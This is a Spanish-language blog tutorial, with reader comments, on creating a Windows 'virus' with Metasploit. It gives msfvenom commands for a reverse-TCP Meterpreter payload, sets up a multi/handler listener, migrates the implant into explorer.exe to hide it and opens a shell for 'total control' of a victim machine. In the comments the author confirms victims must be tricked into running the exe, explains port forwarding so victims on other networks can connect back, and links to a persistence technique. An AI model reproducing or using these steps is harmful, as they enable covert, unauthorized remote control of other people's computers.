Creación de virus, ocultación y control remoto del equipo víctima. Kali Linux.

Hola muy buenas, hoy os traigo una guía de como crear un virus mediante Metasploit Framework, específicamente con la herramienta que nos proporciona Metasploit y es la de crear payloads, una vez creado el payload crearemos el servidor con el que interactuara el virus para poder tener acceso total a la máquina vícitma, a continuación muestro como:

Hallan-nuevo-poderoso-virus-inform-1554006

Comenzamos con la creación del payload (virus), empezaremos por abrir una consola en Kali Linux y escribiendo el siguiente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[nuestra IP] LPORT=[9999] -a x86 –platform windows -o /root/Desktop/virus.exe -f exe

Screenshot_1

-p: Especificamos el payload a utilizar.

-a: Arquitectura que va a utilizar el virus.

–platform: Plataforma en la que actuara el virus.

-o: Directorio donde se guardara el virus.

-f: Formato en cual se guardara el virus.

Aquí el virus creado:

Screenshot_2

Ahora procederemos a crear el servidor, el cual interactuara con el equipo o equipos infectados, abrimos una terminal y escribiremos lo siguiente:

msfconsole

Screenshot_3

Una vez ejecutado metasploit, usaremos el siguiente comando:

use multi/handler

Screenshot_4

Una vez ejecutado lo siguiente, ejecutaremos el payload server de la siguiente manera:

set PAYLOAD windows/meterpreter/reverse_tcp

Screenshot_5

Hacemos un show options:

show options

Screenshot_6

Tendremos que insertar lo anteriormente configurado, el LHOST y el LPORT, pondremos los anteriormente configurados en el virus:

set LHOST 192.168.1.116

Screenshot_7

set LPORT 9999

Screenshot_8

Una vez insertados los dos parámetros, procederemos a la explotación:

exploit -j

Una vez explotado, ejecutaremos el virus en un máquina con windows:

Screenshot_9

Una vez ejecutado, en la consola donde explotamos saldrá lo siguiente:

Screenshot_10

Lo siguiente que haremos será ver las sesiones que tenemos ejecutadas con este servidor:

sessions -i

Screenshot_11

Este comando nos dará la información de todas las sesiones que tenemos conectadas a nosotros mediante el virus creado:

Screenshot_12

Como podemos apreciar nos da la información de la víctima, ahora procederemos a habilitar la interacción con el virus para poder mantener el control total de la máquina atacada:

sessions -i 1

Screenshot_13

Esto nos conectará a la máquina atacada, una vez ejecutado haremos un ps, esto sirve para ver los procesos ejecutados de la máquina atacante:

Screenshot_14

Aquí los procesos de la máquina y entre ellos vemos el virus creado:

Screenshot_15

Ahora lo que haremos será ocultarlo a la vista, lo cual lo fusionaremos con otro proceso el cual elegiremos Explorer.exe:

Screenshot_16

Para fusionar los dos procesos, lanzaremos el siguiente comando:

migrate [id del proceso]

Screenshot_17

Objetivo completado:

Screenshot_18

Una vez realizado esto, lanzaremos el comando shell, esto nos dará la consola del equipo víctima:

shell

Screenshot_19

Ahora nos iremos a C:/

Screenshot_20

Llegaremos a C:/ y haremos un dir para ver por ejemplo que carpetas tiene:

Screenshot_21

Aquí el resultado, control total sobre la máquina infectada:

Screenshot_22

Todo el proceso y las imágenes han sido comprobadas y capturadas por mi.

Saludos, David De Maya Merras, @DavidDeMaya

Please follow and like us:
0

8 comentarios sobre “Creación de virus, ocultación y control remoto del equipo víctima. Kali Linux.

  1. brandon Contestar

    Hola amigo , he visto muchos de esos tutoriales , cuando migro el virus a explores se supones qe alli deberia de ya qedar remotamente , porqe explores se inicia cuando incia sesion windows, lo cual bastaria con solo hacer la coneccion con metasploit , pero a mi no me qeda remotamente …bueno la verdad tampoco me interesa este tipo de virus pues he leido bastante qe es un virus muy para novatos ….lo mejor es aprende a programar….”existen 2 tipos de hackers , el que pograma y el fabricante” suerte compañero !

    • davidd172 Contestar

      Hola brandon, habrás visto muchos tutoriales, pero tendrás primero que aprender a como dominar este tipo de virus, te explico, si no te queda el backdoor nativo, es debido a que migrar un proceso a otro sirve para ocultárselo a la víctima, para dejarlo nativo tienes que seguir otro procedimiento diferente, y si este tipo de virus o backdoor es muy inicial, pero con unas técnicas de ocultación llegan a ser muy eficientes, también es mejor crear un virus a código pero para iniciarse en el hacking esta bastante bien, y por cierto “existen dos tipos de hackers, el que programa y el hacker que utiliza el programa :)” La suerte me acompaña.

    • david Contestar

      Hola Papa Pitufo, sirve también para otras redes, pero para que se pudiesen conectar a ti desde otra red, tendrías que hacer una configuración diferente, por ejemplo abrir un puerto en tu router, para permitir las conexiones de las víctimas, redirigir ese puerto al la máquina atacante, y la configuración de las IP’s en el momento del ataque. Gracias por visitar mi blog.

  2. Mauricio Contestar

    hola tengo una duda, como se hace para copiar y ejecutar el virus.exe en la maquina con windows, se puede hacer remoto? o se debe ejecutar en la maquina y hacer la copia manual? si fuera el caso, me imagino que es aquí donde entra la parte donde se engaña al usuario para que lo ejecute por nosotros verdad ?

    • david Contestar

      Exactamente mauricio ese “virus.exe” es el que debe ejecutar la víctima para que podamos realizar el backdoor. Exactamente lo puedes copiar en la máquina víctima mediante un USB o echar imaginación para que la víctima lo ejecute.
      PD: Gracias por visitar el blog Mauricio. David De Maya.

  3. MrKAli Contestar

    muy bien explicado, ahora sobre los puertos ya lo sabia para hacerlo remoto pero para hacerlo nativo entiendo que tienes que juntarlo a cierto proceso que se ejecute inmediatamente por ejemplo svchost.exe ahora si lo junto a dicho proceso efectuaria al prender la pc ? incluso si la victima llegara a borrar el ejecutable? no se si mi pregunta es muy confusa, trate de explicarme lo mejor posible.

    • david Autor del artículoContestar

      Hola MrKali, aquí te dejo un vídeo del canal de youtube para que puedas hacerlo persistente aunque se reinicie o se borre el .exe, Vídeo, saludos, David.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *